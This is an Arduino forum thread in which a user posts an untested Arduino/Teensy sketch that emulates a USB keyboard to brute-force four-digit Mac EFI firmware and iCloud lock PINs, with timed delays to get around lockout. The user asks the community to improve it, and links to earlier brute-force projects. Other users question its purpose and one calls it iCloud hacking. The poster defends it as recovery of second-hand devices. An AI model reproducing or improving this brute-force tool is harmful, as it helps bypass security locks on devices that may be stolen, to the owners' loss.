Topic: Revisiting orvtech's EFI Firmware & iCloud unlock for Macs

Somerset

May 24, 2015, 07:33 am Last Edit: May 24, 2015, 08:37 am by Somerset Reason: added code select
This sketch has been kicked around and modified for years. I would first like to thank orvtech, knoy, Ivan Mendoza, Anaruz, evasoft, yixiy, amora, and all of the others that developed and helped improve this sketch along the way (sorry to those I didn't mention). The original version was written for use with Teensy 3.0 and then later scripted for Arduino Leonardo. The best part of these sketches is they turn bricks back into the useful machines they were intended to be. The worst part of these sketches is the lack of convenience, including having to watch the display, the clock, and ultimately work out the attempts over time to actually retrieve what the sketch was written for. Finally, the sketch has been utilized to make companies (and individuals) hundreds of dollars. Devices and "services" are sold on eBay for $60-$100. NerdsArmy even has several versions - the top of the line costing around $450.
My intention is to have great minds working on this again to include the best features at the lowest cost. Instead of the Teensy 3.1 version that leaves you to set up a video recorder, run calculations, and possibly run additional, modified attempts to get to the goal - I think the ultimate device would include the necessary keyboard strokes, mouse movements and clicks, LCD display of counter, and the ability to stop when finished - possibly utilizing a microphone to listen for a reboot chime (if applicable), or a light sensor that can detect the screen change, or by being aware of a USB hardware check.
I don't know the entire Arduino catalog but I'm envisioning the Leonardo with LCD shield for this task. I'm not really concerned with the increase in size and cost but more efficiency and functionality.
I am new to this whole environment and have no knowledge of writing code. I haven't produced or utilized any devices (though I plan to). I've spent more time with hardware and repair which has led me on this search. I've read many blogs and found there is a lot of great information scattered all around but no convenient one-stop-shop for those who are interested in producing their own, quality, working device with a step-by-step tutorial. Perhaps the community mindset is "if you can't labor through hours, days, and years of blogs and put your own blood and sweat in - then you simply don't deserve it".
Anyway....The "base" sketches can be retrieved from GitHub.
Here is something I've compiled but it hasn't been tested and more than likely does not work - just a concept or a theory. (Note: it doesn't yet include anything to stop the count when goal is met). Please forgive my ignorance.

Code: [Select]


#include <usb_keyboard.h>
#include <LiquidCrystal.h>
LiquidCrystal lcd(12, 11, 5, 4, 3, 2);

const int ledPin = 13; // choose the pin for the LED
int counter = 0;
//waits for iCloud
int loops = 0;
int fakecounter = counter;
char pin[]="xxxx";

void setup() {

lcd.begin(16, 2);
lcd.print("CODE INPUT");
pinMode(ledPin, OUTPUT); // declare LED as output
delay(30000);
Mouse.begin();
}

void loop(){
//lets wait 1 minute and 1 second
  if (loops == 5){
  delay(61000);
}
//lets wait 5 minutes and one second
  else if (loops == 6){
  delay(301000);
}
//lets wait 15 minutes and 1 second
  else if (loops == 7){
  delay(901000);
  loops = 0;
}
//lets get to work
if (counter <= 9999){
  delay(1500); // vs (8000)
  digitalWrite(ledPin, LOW);
  Mouse.click();
  delay(800); // vs (5500)
  digitalWrite(ledPin, HIGH);
  sprintf(pin, "%04d", fakecounter);
  //sending first digit
  Keyboard.press(pin[0]);
  delay(450);
  Keyboard.release(pin[0]);
  delay(420);
  //sending second digit
  Keyboard.press(pin[1]);
  delay(398);
  Keyboard.release(pin[1]);
  delay(510);
  //sending third digit
  Keyboard.press(pin[2]);
  delay(421);
  Keyboard.release(pin[2]);
  delay(423);
  //sending fourth digit
  Keyboard.press(pin[3]);
  delay(430);
  Keyboard.release(pin[3]);
  delay(525);
  //sending return
  Keyboard.press(KEY_RETURN);
  delay(305);
  Keyboard.release(KEY_RETURN);

  lcd.setCursor(0, 1);
  lcd.print(pin[0]);
  lcd.setCursor(1, 1);
  lcd.print(pin[1]);
  lcd.setCursor(2, 1);
  lcd.print(pin[2]);
  lcd.setCursor(3, 1);
  lcd.print(pin[3]);

}

//reached 4 digit PIN max value
if (counter > 9999){
  for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
  }
  delay(6000);
}
++counter;
++loops;
fakecounter = counter;
}



Please keep replies and comments relevant and useful.
Thank you.

JimboZA

#1
May 24, 2015, 07:38 am Last Edit: May 24, 2015, 07:38 am by JimboZA
First relevant and useful reply: please edit the post and put the code inside
[code]code here[/code] tags so that

Code: [Select]
it looks
{
like this
}


While you're at it, you might like to give the thread a title that actually gives some info.
meArm build blog:     http://jimbozamearm.blogspot.com/

Please don't PM for technical advice. Firstly my advice is sometimes wrong, and second, in the forum you get a broader, more timely, range of responses.

UKHeliBob

OK, I give up, what is the purpose of the program?
Please do not send me PMs asking for help.  Post in the forum then everyone will benefit from seeing the questions and answers.

Somerset


JohnLincoln

Even with the change of title, I am still none the wiser.


You have shown us a sketch, that you say is untested.

We don't know what it is supposed to do.

Even if we were to test it for you, how would we know whether it was a pass/fail?

Somerset

The "device" is supposed to enter (as a USB HID) the 10,000 possibilities of a 4-digit numeric code with delays built in to copy human typing. It also applies mouse movements and/or clicks to keep the computer from going to sleep. (Some variations call for a restart of the computer at certain intervals). In the early stages the sketch only allowed for the keystrokes and the user would have to watch along or set up a video camera, along with a timer, to capture when the code was finally entered correctly. The user would then have to figure how many attempts were made over the period of time and do the math to get close to the code to manually type entries until the exact match was found. Sometimes this also meant running the device again with a narrowed range. Later the sketch allowed for an LCD to display the number that was being entered. This made it easier, since the user didn't have to do the calculations, but the user still had to record the process - as it takes roughly 2 days to enter all 10,000 possibilities. Though the numbers were being displayed, however, the process would keep running even after the correct code was entered. Thus the need for coming up with a way to stop the device - via microphone, light sensor, etc.
Keep in mind this was originally written (and seemed to work best) with the Teensy 3.0 or 3.1. Some have used Arduino Leonardo and that is what I am hoping to build on.

Please allow me to post some links that may help with the explanation:

http://forum.arduino.cc/index.php?topic=209030.0

http://forum.arduino.cc/index.php?topic=198508.15

http://forum.arduino.cc/index.php?topic=187304.15

https://github.com/orvtech/efi-bruteforce

https://github.com/knoy/iCloudHacker/

http://iivanmendozaa.blogspot.com/2014/11/automated-brute-force-pin-lock-for.html

Thank you for your time and interest.

UKHeliBob

So this is an attempt to write a program to hack an iCloud account.

Somerset

Let's call it a retrieval device. I do not condone the theft of property or information. In my experience repairing machines, there are many items that are sold online (eBay) that are locked. Just because an item is locked doesn't mean it was stolen. Some of these items could be lost or the rightful owner has passed away or simply forgot the firmware password and could not provide all of the necessary information to Apple to unlock them. Apple has become very strict in this regard. What do they care about bricked devices - that just means they're more able to sell new products.
Again, I do not condone any illegal activity or misuse of this device.
